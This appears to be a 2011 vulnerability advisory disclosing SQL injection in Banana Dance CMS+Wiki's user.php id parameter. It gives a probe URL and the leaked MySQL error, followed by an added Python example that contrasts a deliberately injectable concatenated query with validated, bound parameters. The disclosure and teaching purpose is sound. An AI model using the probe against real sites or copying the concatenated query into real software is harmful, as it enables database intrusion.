+-----------------------+
| Banana Dance CMS+Wiki |
+-----------------------+

Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability: SQLi
Author : Aodrulez.
Email: f3arm3d3ar@gmail.com
Google-Dork: :) Guess it.
Tested on: Ubuntu 10.04
Web-App: http://www.doyoubananadance.com/
Download Link: http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7

+---------+
| Details |
+---------+

1] SQLi
   Exploit : http://localhost/user.php?id=1'[sqli]

   Error:
   ------
   Invalid query: SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
   Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

+----------+
|MalCon|
+----------+
(International Malware Conference)

The CFP for MalCon-2011 is ON! If you think you are good enough,
try cracking our 'Capture the Mal Challenge-2011' online. Open to
everyone! For more details, visit http://malcon.org

+-------------------+
| Greetz Fly Out To |
+-------------------+

1] Amforked(): My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
7] www.nsd.org.in
8] LiquidWorm

+-------+
| Quote |
+-------+

"Microsoft is not the answer. Microsoft is the question. NO is the answer." - Erik Naggum
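
Added example, not part of the original advisory or the Banana Dance code: a Python/SQLite model of the query shown in the error message under Details, contrasting string concatenation of the id parameter with a validated, bound parameter. The table and column names come from that error message; the sample rows, the function names and the use of SQLite in place of MySQL are assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed sample rows; table/column names are taken from the error message.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE `bd_user_data` (`user_id` TEXT, `key` TEXT, `value` TEXT)")
    db.executemany("INSERT INTO `bd_user_data` VALUES (?, ?, ?)",
                   [("1", "nickname", "alice"), ("2", "nickname", "bob")])
    return db


def lookup_concat(db, user_id):
    # Pattern implied by the error: the request value is pasted between quotes,
    # so a quote character in it changes the structure of the statement.
    sql = ("SELECT `key`,`value` FROM `bd_user_data` "
           "WHERE `user_id`='" + user_id + "'")
    return db.execute(sql).fetchall()


def lookup_bound(db, user_id, validate=True):
    # Hardened form (hypothetical fix): allow only a short ASCII integer, then
    # pass the value as a bound parameter so it is always treated as data.
    if validate and not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("user id must be numeric")
    sql = "SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`=?"
    return db.execute(sql, (user_id,)).fetchall()


def outcome(fn, db, user_id, **kw):
    # Return the rows, or the exception class name if the call failed.
    try:
        return fn(db, user_id, **kw)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    probe = "1'"  # the value from the advisory's request
    # Concatenation: the database reports a syntax error (SQLite's wording
    # differs from the MySQL message quoted in the advisory).
    print("concat       :", outcome(lookup_concat, db, probe))
    # Binding alone: the quote is plain data, no row matches, no error.
    print("bound only   :", outcome(lookup_bound, db, probe, validate=False))
    # Validation + binding: the request is rejected before reaching the database.
    print("bound+checked:", outcome(lookup_bound, db, probe))
    print("legit id     :", outcome(lookup_bound, db, "1"))
```

Returning a generic error page instead of the raw "Invalid query" text also keeps table and column names out of responses.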